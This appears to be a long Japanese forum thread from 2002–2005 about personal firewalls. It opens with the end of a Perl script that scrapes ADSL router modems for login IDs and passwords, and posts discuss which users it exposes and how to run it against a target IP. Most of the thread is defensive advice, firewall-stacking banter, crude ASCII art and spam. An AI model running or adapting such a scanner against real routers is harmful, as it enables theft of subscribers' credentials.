/VALUE="([^"]+)"/;
$pass=$1;
$suc++;
}
}
if ($server=~/^Apache\/1\.1\.3$/);
if ($suc==2) {
print "$ipstr...ID: $id, Password: $pass ($server)\n";
} ;else {
print "$ipstr...failed2 ($server)\n";
}
}
sub kill { exit;}
>>138 某有名なADSLルータが返してくるのが Server: Apache/1.1.3 。
だから別に本当のApacheを相手にしているわけじゃないな。
プロバイダからの説明書にはユーザ名とパスワードの設定方法ぐらいしか載ってないから
そのままつなげている人のパスワードはばればれ。
さすがに最近のファームウェアではパスワードを取得することはできなくなっているけどね。
まあ、実行してみたらわかると思うけど、かなり危険なスクリプトだよ。
スマソ。警告ageのつもりがsageてしまった。
Server: Apache/1.1.3って返すことは、本物のApacheが入っているのか、
フェイクの為に返しているっていうどちらだろ。
ルータータイプのADSLモデムって、
モデムにユーザー名とパスワードを保存するので危ないネ!
おかげで、オレはたっぷりパスワードを保存出来たがね。
>>149 ガーン、そうだったのか…私が無知でした。
つーことは、
>>140の話とあわせると結構面白いことができるのか。
>>105のいう
> FireWollがあっても、パスを奪取できるハッキングプログラム
とは少し違う気がするが、オリジナルだとしたらただのハッタリじゃないと
いうことか。
ウィルスに感染し何気なく再起動してしまった哀れな153は逝って参ります。
本物だったら面白いな。
あぼーん
さすがにパスをそのまんま公開したらまずいっしょ。
いつまでこのスレは残るんだろうね。
age
まじでやばいね。
また、タイーホ者がでるのかな。
どきどき。
age
>>54 ネタか?
それは閉じたらダメだよ。
そのうち繋がらなくなる。
age
∧∧∧ [ヽ / ̄ ̄ ̄ ̄ ̄ ̄
( `.∀.´) D < 通報しますた。
/ \[丿∂ \______
_ | | | / ∂
|\ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ ∂ ┌ ┐
./..\\ \ .< ◎ >____ _ _ _
/ \|=================|
\ ノ \
\ .\
\ ..\
タイーホ
あげ
165 :
名無しさん@お腹いっぱい。:02/02/06 00:38
age
166 :
名無しさん@お腹いっぱい。:02/02/06 16:25
167 :
名無しさん@お腹いっぱい。:02/02/06 17:15
あげ
>>128 の真中exampleの後のip を変えたらいいのかな。俺はスクリプト全然わかんないんで。こいつで、自分の鯖のセキュリティ試してみたいんだけど。
>>168 コマンドラインにターゲットのIPアドレスを指定するだけでよさげ。
170 :
名無しさん@お腹いっぱい。:02/02/07 18:55
>>168-169 外部から見られるかどうかが問題なんじゃないの?
内側から検証してもあんまり意味ないと思うが。
ところで、あのプログラムで設置盗まれるのは、具体的
にはどういう人達なの? 部外者なので、よーわからん。
>>170 外部から自分のグローバルIPアドレスにアクセスすればいいんじゃない?
シェル開放してるサーバ使うとか、CGIに仕立てるとか。
> ところで、あのプログラムで設置盗まれるのは、具体的
> にはどういう人達なの? 部外者なので、よーわからん。
>>128のスクリプト先頭にあるコメントを参照。
155であぼーんされたのも、ADSLで上記プロバイダを使ってる人のパスとかだった。
>>171 いや、Nifty の ADSL 利用者が対象だって事くらいは、
わかってます。フレッツなのかその他のホールセール業
者なのか、がわからないんです。イーアクセスの8Mレン
タルモデムが対象ではなさそうなのは、自分で持ってる
ので分かるんですが。
安全性のチェックは、適当な proxy server で自分のグ
ローバルIPアドレスのwwwポートにアクセスするか、ポー
トスキャンしてくれるサイトを利用するかすればいいで
すね。
内容をチェックせずに、あんな怪しいプログラムを動か
すのは危険です。
(内容が分かってれば動かす必要が無いのも分かるはず)
173 :
ニフ使ってマス。:02/02/09 21:09
そんなにニフはヤバいんでしょうか??
どういう対策が必要なんでしょう・・・
何かニフやめたくなってきた。
174 :
Japanese Tea:02/02/17 16:04
フフフ
オレが本物だってことが分かったかな。>ALL
>>172のバカ
フレッツなのかその他のホールセール業者なのかは特に関係ないぞ。
キヒヒ
基本的に複数の特定モデムをねらい打ちだからな
ちょっとヒントをやろう。
1NECモデムはPPPoEではなくPPPoAで使うときのみDHCPルーターとして働くが、
グローバルIPはモデムに割り振られる。
2フレッツでレンタルのルータータイプのモデムは、
プライベートIPしか使わないので、外部から接続不可能。
このへんが理解できればもう少しわかるかもな。
まぁバカにゃわからんだろうがな。ケケケケケ
プロセスとスレッドの違いも分からん奴が
本物とか言ってもなぁ。
まぁ、本物のアホには違いないが。
176 :
名無しさん@お腹いっぱい。:02/02/18 09:25
詰め込め詰め込め
所詮コピペ厨
本物(プ
tiny&Zone&ICE&Nortonですが何か?
そしてルーター。これ最強。
チョットメンドー
>>178 残念ながら、TinyもZoneもICEもNortonも
>>128-130のスクリプトを防げない。
なぜなら、このスクリプトはマシンでなくADSLモデムを対象にしているから。
ルータも無意味…なんだけど、わざわざルータを別に持っているということは
ADSLモデムはルータモードではないわけで、その意味ではこのスクリプトの
影響は受けないかも。
IDSやFWを多重にインストールしている点については…確かに1つの製品では
防げない部分を他でカバーできるかもしれないけど、DoSに弱くなる気もする。
182 :
名無しさん@お腹いっぱい。:02/02/18 18:29
ルータでWWWポートをステルスにしてると大丈夫ですよね?
>>174 >フレッツなのかその他のホールセール業者なのかは特に関係ないぞ。
ADSL 8Mはレンタル主流。NTT西のフレッツなんかは特定
機種買い取りのみだから、関係ありまくりだろう。
まあ、かなーり狭い範囲らしい事はなんとなくわかった。
とりあえず、ありがとさん。
ついでに、いらぬお世話かも知れんが、あのperlスクリ
プト、何の自慢にもならんよ。
警告age
警告age
>>174 >基本的に複数の特定モデムをねらい打ちだからな
>
>ちょっとヒントをやろう。
>1NECモデムはPPPoEではなくPPPoAで使うときのみDHCPルーターとして働くが、
>グローバルIPはモデムに割り振られる。
>2フレッツでレンタルのルータータイプのモデムは、
>プライベートIPしか使わないので、外部から接続不可能。
>>182 ルータよりモデムがWAN側にあるんだろ?
外からモデムへのアクセスをルータでどうやってフィルタするんだよ。
ネタ?
要するにAccaのルータモデム用か。
>>182 ネタかもしれんがマジレス
「ルータモデムのWAN側のWWWポートをステルス」してれば大丈夫
モデムに繋いだ別のルータでステルスしてもルータモデムは外から丸見え
>>186 >>188 ルータモデムにルータを繋げるという発想がよくわからん。
それもネタなのか?
>>182 とりあえずSecurityScanサービスやってるサイトへ行ってチェックしなさい。
Port80が閉じてればこのスクリプト何も出来ない。
>>189 >>182がルータと書いてるのを素直に受け取ったよ。ルータモデムの
機能が不充分なら別のルータやゲートも使うと思うのはそんなに変か?
>>182はそんな事してないかもしれんが・・・
>>190 >ルータモデムの機能が不充分なら別のルータやゲートも使う
その可能性もあるね。
でも
>>182がそんな芸当が出来るユーザーならこんなところにこんな質問しないだろう、と思っただけ。
「ブリッジモデム+ルータ」 or 「ルータモデム単体」 と考えるのが妥当だろうと…。
喧嘩を売っているわけではないので、気を悪くしたらスマソ。
今回Japanese TeaがFirewall「ソフト」の存在に関係なく動作するスクリプトをコピペ紹介してくれたことは、
Firewall「ソフト」さえ入れておけば安全と思い込んでいる素人さんへの良い警鐘になったのでは?
最低でも
・Port80を閉じる
・ベーシック認証のパスワードはデフォルトのものから変えておく
ぐらいはしなさいと、老婆心ながら強く訴えたい。
あ、どもみなさん、素人の質問にマジレスありがとうございます。
ルータタイプのモデムで、Shields UP!ではPort80はステルスです。
と言うことは大丈夫なんですね、ほっとしました。
193 :
名無しさん@お腹いっぱい。:02/05/20 13:19
Shields UP!ってなんかポート80へのスキャン無くなってないっスか?
それはそうと・・ADSLモデム内蔵ブロードバンドルーターってやつなんですが、
http://scan.sygatetech.com/ ここの「Quick Scan」で全部Blocked
になってればとりあえず大丈夫ですか?このスレ見て不安になったのですが・・。
>>193 そのサイトではBlocked=Stealth
自動反撃機能をもつFWはないのか。
もちろん、PINGでも反撃。
>>196 「ここには誰もいないよん」、ってふりした方が利口だと思うけど。
198 :
名無しさん@お腹いっぱい。:02/05/20 21:43
>>197 「ここには誰もいないよん」って返事をしてます
>>198 「見つけた〜!!!」、みたいな感じで頭からガブっと。
コソーリすごいFWを開発しました。
ブロードキャストでパケットはきまくり機能。
とにかくPING機能
片っ端からポートスキャン機能
当然ステルス機能などありません。
開発コンセプトは「やられる前にやる」です。
204 :
名無しさん@お腹いっぱい。:02/05/21 01:00
やられる前にやる、やられたらネギを食え!
マラえもんもそう言ってたよ
205 :
名無しさん@お腹いっぱい。:02/05/21 01:00
,.:―――‐‐.、あたまテッカテカ 濡れてピッカピカ
/ , - 、, - 、 ヽ それがどうした 僕マラえもん
/ ,.-‐'l 。 ,! 。 l―.ヽ
l l ヽ` - ○- ' ‐ i l 大人の世界の 電動ロボット
l l - `ー┴―' ‐ l.,! どんなもんだい 僕マラえもん
\ヽ' `./
ヽ===(テ)=="l 奇妙奇天烈 摩訶不思議
(l () () .l 奇想天外 自己挿入
l () l) 悶エ迅速 男ハ不要
l () l
l () l) マラえもん(ウィンウィン)
(l () l マラえもん(ウィンウィン)
l () () l ツウ販デカッタ
l () l) 通ハンデ買ッタ
〔liiiiiiiiiiiiiiiiiiiiiiiiiiiil〕 マラえもん
〈:..... .....:〉
〈:..... .....:〉
〈 .〉
l`ー―――‐‐'l
`ー――――
>>202 >>203 すみません。FWとはいいませんね。
ここは控えめに、スーパー中継サーバを開発しました。
あらゆるパケットを中継・返送(ポートスキャン後)いたします。
もちろん、すべてウイルス内蔵です。
メール→ウイルス付き!
プロキシ→ウイルス付き!
その他→ウイルス付き!
開発コンセプトは「皆殺し」です。
>>201 FW=Fire Weapon? いいねぇ、それ
あーSygateとOutpostと黒氷組み合わせたファイアーウォールないかな
今、黒氷とNISProとゾーンとSygateとLookn入れてるよ
あげ
211 :
名無しさん@お腹いっぱい。:02/05/29 06:15
ここでハックできるよって指摘されてるモデムってNUかな?
非常に気になる!!
うちはルータかましてWinWrapperと黒氷とマカフィだよ〜んんん!
じかに繋いでいたときには挿入されて、トロトロ流し込まれたことあるし(w
213 :
名無しさん@お腹いっぱい。:02/08/31 12:48
NTTのフレッツADSL(1.5M)のサービスを受けようと思ってる今年24の男ですが
先ほどオフィシャルペーシ(申し込みページ)゙を確認したところ、ADSLモデムを購入
若しくはレンタルとあります。実は当方もうNTT ADSL MODEM N-2を所有し
ており、レンタルも購入も不要なわけですがこういった場合どうしたらいいと
思います?
また自宅が中継基地局から3km位離れているのですがどのくらいの速度
が出るものなのでしょうか?(アナログ回線、特に最たるノイズ源なし
コピペだね。
■■■■■■■■終了■■■■■■■■
216 :
名無しさん@お腹いっぱい。:02/12/11 07:09
火壁で地獄を焼き尽くす。
217 :
アイタタタタ:02/12/11 07:37
アイタタタタタタタタアイタタタ腰がいたいのアイタタタ・・・・・・・・・・・・・・・・・・・・・・・・・・
IDSとFWの違いがわからないど素人アイタタタ・・・・・・・・・・・・・
腰が砕け散るよアイタタタタ
218 :
アイタタタタ:02/12/11 07:46
>>1 こんな糞スレ立てちゃうぐらいの
>>1って羨ましいな
羨ましいなぁ〜
あんなあほうになってみたい
>>216-218 遠い過去に語りかけているので、
■■■■■■■■■■■■ 終了 ■■■■■■■■■■■■
220 :
名無しさん@お腹いっぱい。:02/12/11 08:48
俺は、人間IDSだ。
221 :
bloom:02/12/11 09:22
222 :
名無しさん@お腹いっぱい。:02/12/11 22:01
NISとバスターとZoneとICEを同時に使ってたら、システムが死亡。
>>222 >NISとバスターとZoneとICE・・
Σ(´-`;)・・・うちと同じ構成
(^^)
まあいっぱい入れてOS不安定にして、それで安心出来るなら
いいんじゃないの
バ カ っ て 大 変 だ ね
南無
串
229 :
bloom:03/03/26 01:44
230 :
名無しさん@お腹いっぱい。:03/04/02 15:28
231 :
名無しさん@お腹いっぱい。:03/04/03 10:22
まあ中級以上になると自分で規則作ったりするから2枚ぐらい
あったほうがよかったりする場合がある。少し違う動きをさせたり
それぞれにない機能をお互いがもってたりするから。
( ´_ゝ`)プッ
プロキシを二重にかませるとかいうのは
聞いたことがある。
でもファイアウオールを何個も入れたらという
のは初めて聞いた。
確かファイアウオールをいくつも入れると逆効果
だったような気がする。
正直、4つや5つもファイアウオール導入する
というのはどうかと。。
たしかOutpostの前スレで同じような議論が…
漏れがあるなら重ねて入れずに、確かなものを1つだけ導入すれば済む話。
>>237 どうしても使いたいんだろOutpost
239 :
名無しさん@お腹いっぱい。:03/04/03 17:19
>>233 逆効果というが不安定になる。お互いに干渉を起こして。
>>234 干渉が起こらなければそれぞれ違う機能があったら
入れてもいいかと。2つぐらいまでだと思うけどね、入れても。
ネタスレを壊すなゴルァ大作戦
まだあったんだ、このスレ。
思えばTiny板で・・・
>>241 ああ、Tinyスレだっけ?懐かしいなぁ。初めは「FW複数入れる」って奴を
馬鹿にしてた住人が「相互干渉の傾向と対策を探求する」というその姿勢
を見直して「馬鹿にしてすまんかった」とまで言ってたっけ……
243 :
名無しさん@お腹いっぱい。:03/04/06 12:02
age
僕は未だにファイアウオール一個しか入れてないね。
というのも、やはり大量に導入するには不安がある。
セキュリティソフトは他のソフトとは特別な作りになっているから
複数入れたら衝突する恐れがあるから止めた方がいいと雑誌で読んだ
記憶ある。
247 :
名無しさん@お腹いっぱい。:03/04/09 10:39
>>246 雑誌って、物によって全然意見が違ってたりするからなぁ……。
以前読んだ何かの雑誌には、「一週間に一度はデフラグをした方が良い」とか書いてあった。
もうアフォかと。
そんなに頻繁にHDをガーリガリガリガリ言わせてたら寿命が縮むっつの。
PFWも物による気がする……。漏れはぞぬ1つしか入れてないけど。
>>247 うそーん。2,3日に一度は寝る前にすっきりデフラグを仕込んでた。やばいのか。
ぞぬ使いに言われたくないけどさ。
249 :
名無しさん@お腹いっぱい。:03/04/10 15:51
>>248 使い方によるけどね。人によっては、一週間に一度した方がいい場合もあるらしい。
けど、2,3日に一度は大杉だろ……。
>ぞぬ使いに言われたくないけどさ。
漏れみたいな面倒臭がり屋には、設定要らずでYes No押すだけのぞぬが一番だと言う罠(w
…てか、セキュリティ知識とデフラグは関係ないだろうがああぁぁぁヽ(`Д´)ノ!
ほとんど断片化しない奴がしょっちゅうやってもしょうがないが
断片化が頻繁に起こる奴は2、3日に一度でもいいんじゃないか。
使用状況によるだろ。断片化しなけりゃ1年間やらなくても問題ないし。
252 :
名無しさん@お腹いっぱい。:03/04/11 20:10
>>247 おまえ馬鹿。正真正銘の馬鹿。
デフラグを頻繁にやっていれば、HDが常に最適化された状態になるから
ディスク・アクセスの回数が減り、結果的にHDへの負担が軽くなる。
PCの使い方にもよるけど、わずか一週間のブランクなら断片化はそんなに進まないはず。
だからデフラグ中に移動されるファイルの量も少なくなる。
むしろ回数が少ないほうが、一回のデフラグで移動するファイルが増えるから
HDに大きな負担がかかる。
>>247,
>>252 ソースを示さずに脳内論披露してる時点でどっちもアフォ。
て言うかスレ違いでageんな氏ね。
フリーソフト、すっきり!デフラグのホームページで
>>252とよく似た主張を見かけたような気がする。
>>254 漏れは、Webサイトや雑誌なんかで
>>247みたいなのを読んだ事がある様な・・・・。
どっちが本当なんだ?
(^^)
∧_∧
( ^^ )< ぬるぽ(^^)
XPのFWとぞねとkerioとoutpost入れたらプツっと消えた
そしたらoperaが動かなくなった
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
263 :
名無しさん@お腹いっぱい。:03/05/26 10:30
そんなに不安なら回線引っこ抜け(藁
264 :
名無しさん@お腹いっぱい。:03/05/26 11:45
nennchakuagearasiuzai
ノートンの上にSygate入れたんだが最悪。
遅い串を刺したかのように延々と読み込み中になる。
266 :
名無しさん@お腹いっぱい。:03/06/12 02:57
__∧_∧_
|( ^^ )| <寝るぽ(^^)
|\⌒⌒⌒\
\ |⌒⌒⌒~| 山崎渉
~ ̄ ̄ ̄ ̄
∧_∧ ∧_∧
ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。
=〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
= ◎――――――◎ 山崎渉&ぼるじょあ
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
271 :
名無しさん@お腹いっぱい。:03/08/16 22:37
良スレ発見
もれは、WinMEで
ぞね+あうぽ+けりお
をいれて、スタートアップで起動してる
>>271 Meにそんなに入れたら
リソース大丈夫か?
>>272 砂時計のアイコンが表示されなくなったとき、63%ぐらい。
274 :
名無しさん@お腹いっぱい。:03/08/17 01:43
本当です。
>>271 その画面うpよろしくー。
是非見てみたい。
277 :
名無しさん@お腹いっぱい。:03/08/18 10:58
火壁複数いれると不具合起こすから
多くて2つぐらいにしといたほういいよ。
逆効果だったりするから。
>>278 「たまに使うアイコン」って、何に使ってるの?
ねえ・・・。
のーとん、ぞね、BlackICEはお勧め出来ない。
のーとん、ぞね、BlackICEは超お勧め。
>>282 なんだか挙動がおかしくなるよ。設定が出来てないからかなぁ。
285 :
名無しさん@お腹いっぱい。:03/09/04 06:52
age
バスターのPFW最強。
288 :
名無しさん@お腹いっぱい。:03/09/21 06:29
age
sage
292 :
名無しさん@お腹いっぱい。:03/10/24 03:52
age
293 :
名無しさん@お腹いっぱい。:03/11/19 17:12
ウイルスバスタ使ってるとXPの動作が怪しいから捨てた。
いきなり再起動とかマジむかつく。
294 :
名無しさん@お腹いっぱい。:03/12/27 00:03
シマンテックのサイトのスキャンでなぜか詳細が表示されないのでKerioで塞げない。
他のスキャンしてくれるサイトでの結果は大丈夫だったけど。
今のところシマンテックのサイトので全部安全って出たパターン(XP標準+Kerio)
で言ってる。
296 :
(・∀・)ちんちん:04/03/13 00:36
まんまん
297 :
名無しさん@お腹いっぱい。:04/03/13 00:48
age
298 :
(・∀・)チンコー:04/04/02 15:45
マンコー
ぞぬ+XPの。
あとはTCP Monitorで監視、
これでどうよ?
300 :
(・∀・)チンコー:04/04/02 21:01
300まんこゲッツ
301 :
名無しさん@お腹いっぱい。:04/04/05 01:28
302 :
名無しさん@お腹いっぱい。:04/04/06 12:14
age
303 :
名無しさん@お腹いっぱい。:04/04/11 16:24
age
さて、そろそろ他のヤシ試してみようかな。
XPの→ ウイルスバスターのおまけ→ ぞね
と流れてきたんだが、なんかお勧めのFWある?
>>304 もちろん全部入れてるんだろうな
じゃなきゃスレ違いだ
去れ
306 :
名無しさん@お腹いっぱい。:04/04/14 05:43
307 :
名無しさん@お腹いっぱい。:04/04/14 07:02
WindowsのICFと、シマンテックのInternetSecurityに付属のやつの二段構えです
WindowsのICFで、入ってくるパケットをフィルタし、
シマンテックのInternet Security付属のやつで、アプリごとのFWやってます
美味しいお菓子も食べ過ぎると腹を壊します
310 :
名無しさん@お腹いっぱい。:04/04/15 19:57
311 :
名無しさん@お腹いっぱい。:04/04/15 20:06
XPのSP2はデフォでファィヤーウォール機能にチェック入るらしいんだけど、
前ノートン入れてる時は機能衝突するから切ってた方がいいって聞いたんだけど、どうなんだろ
313 :
名無しさん@お腹いっぱい。:04/04/15 21:03
>>301 アプリケーション・プロキシ型の進化で
ファイアウォール限界説が崩れつつあります。
314 :
名無しさん@お腹いっぱい。:04/04/16 00:30
串焼き旨いよね。
>>312 切らなくていい。もうβでてるから入れてみ。
316 :
名無しさん@お腹いっぱい。:04/04/17 21:21
317 :
名無しさん@お腹いっぱい。:04/04/18 17:07
SP2のRC1のことだろ。
318 :
名無しさん@お腹いっぱい。:04/04/18 21:22
>>317 余計にややこしくなって・・・なおさらわけわからんつーのっ!! ヽ(*`Д´)ノ
それぐらい自分で調べれ。
すぐに分かる。
320 :
名無しさん@お腹いっぱい。:04/04/19 21:50
322 :
名無しさん@お腹いっぱい。:04/04/24 05:50
保守してときます
323 :
名無しさん@お腹いっぱい。:04/04/24 11:59
outpostの最新版入れてPC再起動したら、常にCPU100%でめちゃ重くなった。システム不安定で再起動無限ループに。。
ウイルスバスター2004と競合してるのかな?? 詳しい人教えて
324 :
名無しさん@お腹いっぱい。:04/04/25 17:16
hoshu
325 :
名無しさん@お腹いっぱい。:04/04/25 17:38
326 :
名無しさん@お腹いっぱい。:04/04/25 18:05
327 :
名無しさん@お腹いっぱい。:04/04/25 18:28
>>326 情報THX!
で、ゾーンアラームインスコするときにVB2004は起動したままでOK?
328 :
名無しさん@お腹いっぱい。:04/04/25 20:00
329 :
名無しさん@お腹いっぱい。:04/04/25 22:56
>>323 ファイアウォールが勝手にインストールされた。ファイアーウォールはアンインストールできますか?
また、他のファイアーウォールを使用することはできますか?
サポート対象外のようですができます。
C:\Program Files\Trend Micro\Virus Buster 2004\PCCTool.exe
を起動すると、アンインストールタブにボタンがあります。
【他のFWを導入する場合の手順】
他のFWをアンインスコ→→バスターインスコ→
→上記の手順でバスターのFWをアンインスコ→→他のPFWを再びインスコ→→(゚д゚)ウマー
バスターのFWと他のFWを共存させるとトラブルが発生するので
他のFWを使用する場合はパーソナルファイアウォール→
パーソナルファイアウォールを有効にするのチェックを外すのではなく
必ず上記の手順でバスターのFWをアンインスコしてください!!!
NISのPFWとZoneを併用してる時点で
>>328は厨。
そんな香具師がメモリ消費量に言及するとは笑わせる。
331 :
名無しさん@お腹いっぱい。:04/04/26 19:05
>>328 >漏れはNoton Internet Security 2003 + Norton AntiVirus + ZoneAlramで何の問題もない。
internet Securityにantivirusも入っているだろ。
でNoton(ノトン)ってなに?
アホ丸出し。プププ
釣られてやったよ。(プゲラ
楽しいか?
てかFW導入すると、やっぱ回線やPCは重くなるんですか?
重くなるんだったら初期装備のままでイイ・・・
初期装備って?
今はどんな構成なの?
あぼーん
あぼーん
337 :
名無しさん@お腹いっぱい。:04/04/27 14:35
糞スレageんな!
>>337 PFWを併用する香具師こそ厨だと思うが?
求道者
341 :
(・∀・)ちんちん:04/04/29 22:49
まんまん
342 :
名無しさん@お腹いっぱい。:04/04/30 00:23
343 :
名無しさん@お腹いっぱい。:04/04/30 12:26
s
344 :
名無しさん@お腹いっぱい。:04/05/01 01:24
インターネット
↓
ルータ(パケットフィルタリング)
↓
ファイアウォール(Netscreen)
↓
Proxy(Linux+squid)
↓
WinXPのICF
↓
Kerio
5段構成のFirewallです
>>344 まじで?すげーな。俺は
インターネット→モデム(ルータ機能なし)→Zone Alarm
ZA様様!!
あぼーん
>>345 そして俺は
インターネット→ルータ(FW)→無線LANカード(WEP64bit)→ウイルスバスター2004(FW+AntiVirus)
バスターのFWは最強でつね。
348 :
名無しさん@お腹いっぱい。:04/05/04 22:30
>>347 AntiVirusはNortonが最強だろ
349 :
名無しさん@お腹いっぱい。:04/05/05 20:58
安定性と信頼性のウイルスバスターサイキョ
>安定性と信頼性の
古くせぇ売り文句だな。
352 :
名無しさん@お腹いっぱい。:04/05/08 00:06
353 :
名無しさん@お腹いっぱい。:04/05/08 00:17
354 :
名無しさん@お腹いっぱい。:04/05/13 16:54
outpostとKerio4を併用してるヤシは居る?
システムセキュリティを導入したいんだけど
ルールを設定するのが面倒なのでoutpostも使いたいんだが
355 :
名無しさん@お腹いっぱい。:04/05/13 21:25
PFWの併用って効果薄いの?
漏れもNIS2003とZoneAlram併用してるんだけど。
NIS2003だから、WinXPのICFは使えない品・・。
ノートンとブラックアイスとゾーンアラームいれてる。
ノートンはアンチウイルスがついてるから入れてるけど重すぎ。現在お荷物になりつつある。
ゾーンアラーム軽いし昔から使用してるので操作も簡単便利。
ブラックアイスは、なんとなく
357 :
名無しさん@お腹いっぱい。:04/05/13 22:24
おめでたい人達ですね
358 :
名無しさん@お腹いっぱい。:04/05/13 23:28
>>356 >ブラックアイス
名前を聞いただけで・・・(((( ;゚Д゚)))ガクガクブルブル
それ自体がスパイウェアみたいだ ┐(゚〜゚)┌
zaの送信はspfでブロック、spfの送信はzaで遮断してたけど、spf重過ぎで、zaのみにした。
zaが、色々情報送りまくってるのだろうなぁ。
fwの送信遮断に特化した、軽いフリーウェアとかないかな。za専用でもいいけど。
ブラックアイスは、普通のシェアのfwだと思う。使ったことないけど。
360 :
名無しさん@お腹いっぱい。:04/05/17 23:01
いっぱい入れるから問題が起きるんだよ。NIS1つだけで十分だよ。┐(゚〜゚)┌
ウィルスに感染したんだけど、どうやってウィルスの種類を判別するの?誰か教えてください
362 :
名無しさん@お腹いっぱい。:04/05/17 23:56
363 :
名無しさん@お腹いっぱい。:04/05/21 23:41
hoshu
364 :
名無しさん@お腹いっぱい。:04/05/28 02:31
オイルよ
365 :
名無しさん@お腹いっぱい。:04/05/31 00:11
age
366 :
名無しさん@お腹いっぱい。:04/06/16 22:07
hoshu
outpostとZoneAlramとXPのファイアウォールの併用ってどうなの?
outpostは他のフャイアウォールと一緒にするといろいろまずかった気がする。
気がついたら
X-Guard、Sygate、Zonealarm、Kerio、Proxiomitoronと5つも入ってた…
今のとこ問題なし…かも
372 :
名無しさん@お腹いっぱい。:04/07/05 04:25
>>369 それで問題無しってPCの性能いいんだね・・・
373 :
名無しさん@お腹いっぱい。:04/07/05 08:39
オミトロンはファイアーウォール上げ
つーか馬鹿だろ?
そんなに入れれば干渉しあって弊害があるのに
375 :
名無しさん@お腹いっぱい。:04/08/11 15:09
バスター+Filseclab+セキュ機能そこそこあるルーターで試してなかなかFW良好 ポートはバスターでアプリ単位でFileclab バスターと混合で一番安定動作 バスターは混合相性合うのなかなか無い
これにspybot+ブラスター+Ad ブラウザ火狐 メール雷鳥 雷鳥はバスターで迷惑&ウイルスメール認識する プロバイダーは回線切るとIP変わるぷららとかでセキュ度アップ
http://jpbpa.net/list/baseball/03/04.htm 南原 僕はテレビの世界で仕事をしてまして、テレビの人間として、プロ野球とか見ているんですけど、
今、個人視聴率とか出てきているんですよ、どの世代が見てるのかというのが出るんです。
プロ野球の場合、ゴールデンタイムなんですけど、見ている層が、50歳代、60歳代。
キッズといわれている14歳から12歳や「F1」層という若い女性のところ、
ま、ゴールデンタイムで1番数字を取るという、
スポンサーが1番喜ぶ、購買層のあるところが全然見ていないんです。
それは何年も前から結果として出てきてて、あれ、プロ野球やばいかなと思って、実際に巨人戦見に行ったら、
スーツ姿が多くて、招待客が多くて、あらら、子供たちは来てないなと。
外野にはちらほらといるんですけど、内野席はほとんどいないんですよ。
378 :
名無しさん@お腹いっぱい。:04/10/19 13:37:24
>>374 XPはパワーがあっていいですね。
Win98でこれやるとパソコンが起動しなくなりますね。
379 :
名無しさん@お腹いっぱい。:04/12/25 07:55:56
【ルーター:ポート4個だけCLOSEあと全部ステルス 】
↑
↑
【プロキシサーバ(NIC2枚差し):ANHTTPD + BlackICE + NEGiES】
↑ ↑(クライアントPCからVNCで遠隔操作)
↑ 【ローカルルーター】
↑ ↓ ↑
|-------------------← ↑
↑
↑
【クライアントPC:ZONEAlarm-Pro + BlackICE 】
フリーソフトのNEGiESはおすすめ。パケットフィルタだけでなくパケット射出制限や帯域制限をアダプタごとに使えるし、
TCPモニタが見易いよ。ポートやパケットのヘッダの流れがわかり易く大変勉強になります。
380 :
名無しさん@お腹いっぱい。:04/12/25 07:57:28
ぐちゃちゃだぁ
NEGiESはpeerguardianいじめるから駄目〜。
382 :
名無しさん@お腹いっぱい。:04/12/26 10:18:56
試しにpeerguardianインストールしてみたら相性問題なかったよ?
設定の問題じゃない鴨??
peerguardianは指定IPパケットだからCPU負荷が高いッス。
メモリ消費は14.0MBもあるし。
ちなみにNEGiESは4.1MB。
383 :
名無しさん@お腹いっぱい。:04/12/29 18:34:17
ZAとSGいれてます。
SG をずしてkerio4入れようと思っておるのですが
ご意見いただけませんでしょうか?
SGを外すのは、このスレの趣旨に反します。
SGも入れておきましょう
385 :
名無しさん@お腹いっぱい。:04/12/29 20:39:17
>>384ありがとうございます。
SpywareGuardは入れておいたほうが良いのですね?
他の方のご意見をお伺いさせていただけませんでしょうか。
ZA SG kerio4 これだけ入れて大丈夫でしょうか?
387 :
名無しさん@お腹いっぱい。:04/12/29 20:58:36
全部入れるのは不安ですので↑でお勧めの組み合わせ
を教えていただけないでしょうか?
ゾーンアラームとKerio2.1.5を併用してるけどなかなかいい感じだよ
389 :
名無しさん@お腹いっぱい。:05/03/19 12:28:26
併用すると何ができるの?
390 :
名無しさん@お腹いっぱい。:05/03/19 12:42:19
PFの併用はいい大人なんだからやめなよ。
上級者はルーターもひとつ用意してダブルNAT。
LAN内うんこインターネットゾーンを置きそこにIDS入りの串鯖を作る。
そしてトラストゾーンから遠隔操作。ウマー
392 :
名無しさん@お腹いっぱい。:05/03/19 12:54:38
ロトのよろい2つ装備しても意味ないって。
ダブルNATはロトのよろい+しあわせの靴+みかがみのたて+ベギラゴン
多重NATしてて安全って、なぜ安全なの?
394 :
名無しさん@お腹いっぱい。:05/03/20 02:38:52
....安全と言った覚えは無いが。
VNCを使えば任意のたった一つのポートのみ通過させて、あとの65535個のポート
はIN〜OUNともに全部フィルタかけることができる。
これで漏洩する情報などなくなるはずだ。
395 :
名無しさん@お腹いっぱい。:2005/03/23(水) 21:15:14
バスター2004にZA追加したら駄目だったよ!
muramasa bladeはいくつあってもうれしいものだが
古過ぎるてか?
有難味が薄れるという理由で二本目以降は捨てる人もいるとか
ノートンのファイアーオールとXPのファイアーオールとついでにルータのファイアーオールもあるんですけど、
三重にしたところでセキュリティは変わらないですか?それとも脆くなりますか
400 :
名無しさん@お腹いっぱい。:2005/05/11(水) 21:20:54
最新のゾーンアラームとKerio2.1.5は併用できないにょ
重くなるだけなのに併用する意味がわからん
402 :
ww:2005/05/14(土) 18:15:50
prevxってかっこいいな
405 :
名無しさん@お腹いっぱい。:2005/05/17(火) 07:15:57
406 :
名無しさん@お腹いっぱい。:2005/05/19(木) 06:42:22
ばかじゃねの
100ぐらいまで読んで気づいたけど何気に長寿スレだったんですね ^^;
ってこのレスも2ヶ月振りくらいか、、、
408 :
名無しさん@お腹いっぱい。:2005/09/22(木) 21:58:49
久々に見に来たにょ
前回自分の書き込んだレスが
>>400だにょ
書き込み少なすぎだにょw
>>405 ケチ臭い俺の会社の事務所は、それに似た環境だよ
だが一歩間違うと(半歩か)、致命的なダメージを受ける甘いセキュリティだよな
賞味期限切れのコピペにマジレスしてみるテスト
411 :
名無しさん@お腹いっぱい。:2005/09/30(金) 01:23:11
